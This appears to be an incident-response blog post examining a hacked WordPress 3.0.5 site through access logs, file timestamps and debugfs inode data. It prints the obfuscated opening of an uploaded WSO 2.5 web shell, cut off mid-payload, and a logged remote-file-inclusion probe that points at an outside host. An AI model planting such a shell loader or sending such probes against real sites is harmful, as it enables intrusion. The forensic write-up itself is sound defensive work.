80.255.227.87 - [24/Jul/2012:15:04:37 -0400] "POST /wp_c182.php HTTP/1.0" 200 826 14258 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
80.255.227.87 - [24/Jul/2012:15:04:38 -0400] "POST /wp_c182.php HTTP/1.0" 200 1755 14268 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
80.255.227.87 - [24/Jul/2012:15:04:38 -0400] "POST /wp_c182.php HTTP/1.0" 200 826 14258 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"
80.255.227.87 - [24/Jul/2012:15:06:35 -0400] "GET /wp_c182.php HTTP/1.1" 200 538 34338 "http://hackedsite.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.19) Gecko/20081201 Firefox/2.0.0.19"
80.255.227.87 - [24/Jul/2012:15:06:35 -0400] "POST /wp_c182.php HTTP/1.0" 200 719 34273 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.19) Gecko/20081201 Firefox/2.0.0.19"
80.255.227.87 - [24/Jul/2012:15:06:36 -0400] "POST /wp_c182.php HTTP/1.0" 200 1556 10360 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.19) Gecko/20081201 Firefox/2.0.0.19"
80.255.227.87 - [24/Jul/2012:15:06:36 -0400] "POST /wp_c182.php HTTP/1.0" 200 750 12443 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.19) Gecko/20081201 Firefox/2.0.0.19"
80.255.227.87 - [24/Jul/2012:15:06:36 -0400] "POST /wp_c182.php HTTP/1.0" 200 823 10350 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.19) Gecko/20081201 Firefox/2.0.0.19"
80.255.227.87 - [24/Jul/2012:15:06:36 -0400] "POST /wp_c182.php HTTP/1.0" 200 1752 10990 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.19) Gecko/20081201 Firefox/2.0.0.19"
80.255.227.87 - [24/Jul/2012:15:06:37 -0400] "POST /wp_c182.php HTTP/1.0" 200 823 10980 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.19) Gecko/20081201 Firefox/2.0.0.19"
80.255.227.87 - [24/Jul/2012:15:07:16 -0400] "POST /wp_c182.php HTTP/1.0" 200 754 34273 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 3.5.21022)"
80.255.227.87 - [24/Jul/2012:15:07:17 -0400] "POST /wp_c182.php HTTP/1.0" 200 1592 69402 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 3.5.21022)"
80.255.227.87 - [24/Jul/2012:15:07:17 -0400] "POST /wp_c182.php HTTP/1.0" 200 787 12450 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 3.5.21022)"
80.255.227.87 - [24/Jul/2012:15:07:18 -0400] "POST /wp_c182.php HTTP/1.0" 200 859 69400 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 3.5.21022)"
80.255.227.87 - [24/Jul/2012:15:07:18 -0400] "POST /wp_c182.php HTTP/1.0" 200 1788 69410 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 3.5.21022)"
80.255.227.87 - [24/Jul/2012:15:07:18 -0400] "POST /wp_c182.php HTTP/1.0" 200 859 69400 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 3.5.21022)"
80.255.227.87 - [24/Jul/2012:15:08:16 -0400] "POST /wp_c182.php HTTP/1.0" 200 787 34273 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
80.255.227.87 - [24/Jul/2012:15:08:17 -0400] "POST /wp_c182.php HTTP/1.0" 200 1624 11619 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
80.255.227.87 - [24/Jul/2012:15:08:17 -0400] "POST /wp_c182.php HTTP/1.0" 200 819 12445 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
80.255.227.87 - [24/Jul/2012:15:08:17 -0400] "POST /wp_c182.php HTTP/1.0" 200 891 11617 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
80.255.227.87 - [24/Jul/2012:15:08:17 -0400] "POST /wp_c182.php HTTP/1.0" 200 1820 11627 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
80.255.227.87 - [24/Jul/2012:15:08:18 -0400] "POST /wp_c182.php HTTP/1.0" 200 891 11617 "http://hackedsite.com/wp_c182.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
80.255.227.87 - [24/Jul/2012:15:15:52 -0400] "GET /wp_c182.php HTTP/1.1" 200 537 34338 "http://hackedsite.com" "Mozilla/5.0 (X11; U; Linux x86_64; en; rv:1.9.0.2) Gecko/2008092702 Gentoo Firefox/3.0.2"
80.255.227.87 - [24/Jul/2012:15:15:57 -0400] "POST /wp_c182.php HTTP/1.0" 200 4064 34283 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (X11; U; Linux x86_64; en; rv:1.9.0.2) Gecko/2008092702 Gentoo Firefox/3.0.2"
80.255.227.87 - [24/Jul/2012:15:15:57 -0400] "POST /wp_c182.php HTTP/1.0" 200 715 34273 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (X11; U; Linux x86_64; en; rv:1.9.0.2) Gecko/2008092702 Gentoo Firefox/3.0.2"
80.255.227.87 - [24/Jul/2012:15:17:46 -0400] "POST /wp_c182.php HTTP/1.0" 200 4084 34283 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3 (.NET CLR 3.5.30729)"
80.255.227.87 - [24/Jul/2012:15:17:46 -0400] "POST /wp_c182.php HTTP/1.0" 200 735 34273 "http://hackedsite.com/wp_c182.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3 (.NET CLR 3.5.30729)"
212.71.10.193 - [24/Jul/2012:15:44:21 -0400] "POST /wp-xml.php HTTP/1.0" 302 2680 425 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:16:36:04 -0400] "POST /wp-xml.php HTTP/1.0" 302 2680 425 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:17:25:44 -0400] "POST /wp-xml.php HTTP/1.0" 302 2680 425 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
80.255.227.87 - [24/Jul/2012:18:06:53 -0400] "GET /wp_c182.php HTTP/1.1" 403 523 400 "http://hackedsite.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
212.71.10.193 - [24/Jul/2012:18:13:25 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:19:03:35 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:19:54:44 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:20:44:11 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:21:34:33 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:22:25:16 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

Hum… I’m not a huge Wordpress guy but I don’t remember seeing a page called wp_c182.php before. Funny I missed that one earlier when I looked at the directory listing.

1
2
3
4
5
6
7
8

$ cat wp_c182.php  
<?php
$auth_pass = "";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x6

After a short analysis, turns out that script is actually WSO 2.5. Unfortunately, it appears that file was uploaded on July 16th and I don’t have those access logs anymore. I’m still curious to know how they got in so let’s see if anything else was uploaded more recently. I noticed earlier that the wp-content directory had been modified today. Maybe we can find something in there.

1
2
3
4
5
6
7
8
9
10
11

$ find . -type f -mtime -1 | xargs ls -il
23210930 -rw-r--r-- 1 2017 2017   143 2012-07-24 15:08 ./cgi-bin/245_box.php
23209564 -rw-r--r-- 1 2017 2017   143 2012-07-24 15:06 ./cgi-bin/24_box.php
23209637 -rw-r--r-- 1 2017 2017   244 2012-07-24 15:08 ./cgi-bin/.htaccess
23208397 -rw-r--r-- 1 2017 2017  2661 2012-07-24 15:17 ./.htaccess
23209655 -rw-r--r-- 1 2017 2017   143 2012-07-24 15:07 ./wp-admin/791_box.php
23209555 -rw-r--r-- 1 2017 2017   244 2012-07-24 15:07 ./wp-admin/.htaccess
23209201 -rw-r--r-- 1 2017 2017 23316 2012-07-24 22:49 ./wp_c182.php
23209200 -rw-r--r-- 1 2017 2017   143 2012-07-24 15:04 ./wp-content/447_box.php
23209250 -rw-r--r-- 1 2017 2017   244 2012-07-24 15:04 ./wp-content/.htaccess
23210949 -rw-r--r-- 1 2017 2017 11101 2012-07-24 10:13 ./wp-content/pic.php

It’s pretty safe to assume that those *_box.php files and pic.php are not supposed to be there. All of these files were last modified today but what I really want to know is when they were created. Using the -i flag in ls, I can use the returned inode index to get that info.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

$ debugfs -R 'stat <23210930>' /dev/sda7
debugfs 1.41.11 (14-Mar-2010)

Inode: 23210930   Type: regular    Mode:  0644   Flags: 0x80000
Generation: 3479487985    Version: 0x00000000:00000001
User:  2017   Group:  2017   Size: 143
File ACL: 0    Directory ACL: 0
Links: 1   Blockcount: 8
Fragment:  Address: 0    Number: 0    Size: 0
 ctime: 0x500ef2a1:5348cf2c -- Tue Jul 24 15:08:17 2012
 atime: 0x500ef2a1:2861e600 -- Tue Jul 24 15:08:17 2012
 mtime: 0x500ef2a1:2861e600 -- Tue Jul 24 15:08:17 2012
crtime: 0x500ef2a1:2861e600 -- Tue Jul 24 15:08:17 2012
Size of extra inode fields: 28
EXTENTS:
(0): 92875357
(END)

So the file was created today. Awesome. Unfortunately, atime is pretty useless since the partition is mounted with noatime. At least, we know this wasn’t here a few hours ago. Let’s see who tried to use those pages.

1
2
3
4
5
6
7

$ grep -iP "\/(pic|\d\d\d?_box)\.php" /var/log/apache2/vhosts_access.log 
94.75.208.167 - [24/Jul/2012:10:49:39 -0400] "GET /pic.php HTTP/1.0" 404 421 9296 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:49:39 -0400] "GET /pic.php.php HTTP/1.0" 404 425 9296 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
85.17.188.139 - [24/Jul/2012:15:35:30 -0400] "GET /wp-content/447_box.php HTTP/1.0" 302 389 198 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)"
85.17.188.139 - [24/Jul/2012:15:50:24 -0400] "GET /cgi-bin/24_box.php HTTP/1.0" 302 379 198 "-" "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
85.17.188.139 - [24/Jul/2012:15:56:18 -0400] "GET /wp-admin/791_box.php HTTP/1.0" 302 385 198 "-" "Mozilla/5.0 ( ; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
85.17.188.139 - [24/Jul/2012:16:07:29 -0400] "GET /cgi-bin/245_box.php HTTP/1.0" 302 397 198 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0"

Meh. Two new IPs. Turns out 94.75.208.167 is a robot designed to find vulnerabilities on a bunch of different sites. Here’s a few examples of the requests it made this morning:

1
2
3
4
5
6
7
8

94.75.208.167 - [24/Jul/2012:10:48:23 -0400] "GET /infolab2.php HTTP/1.1" 404 361 9344 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:48:23 -0400] "GET /info.php HTTP/1.1" 404 357 9344 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:48:23 -0400] "GET /info.pl HTTP/1.1" 404 356 9344 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:48:24 -0400] "GET /infos.php HTTP/1.1" 404 358 9344 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:48:24 -0400] "GET /ini.php HTTP/1.1" 404 356 9344 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:48:24 -0400] "GET /ini.php?file=http://www.eas*removed*l.com/x2.gif HTTP/1.1" 404 397 9344 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:48:24 -0400] "GET /init.php HTTP/1.1" 404 357 9344 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
94.75.208.167 - [24/Jul/2012:10:48:25 -0400] "GET /in.php HTTP/1.1" 404 355 9344 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"

But here’s something very interesting:

1

94.75.208.167 - [24/Jul/2012:10:44:26 -0400] "GET /traninfo.html HTTP/1.1" 200 362 4188 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"

This at least confirms that this IP is linked to the hack in question. Enough messing around. According to wp-includes/versions.php, this site was running Wordpress 3.0.5. That’s 17 months old. Not cool.

Something else I just realized, there is no wp-xml.php in the root folder.

It’s getting late and frankly, knowing that the site was running such an outdated version of Wordpress is sucking all the fun out of this research. A quick google search tends to confirm the hackers used a known XMLRPC exploit to do their business. Another good option would have been Timthumb, or if you prefer, one of the worst piece of code ever produced by a human being. Unfortunately (or fortunately, for what it’s worth), no such plugin was installed on this site.

So that’s about it for tonight. The site is not going back online and the content will be scrapped shortly.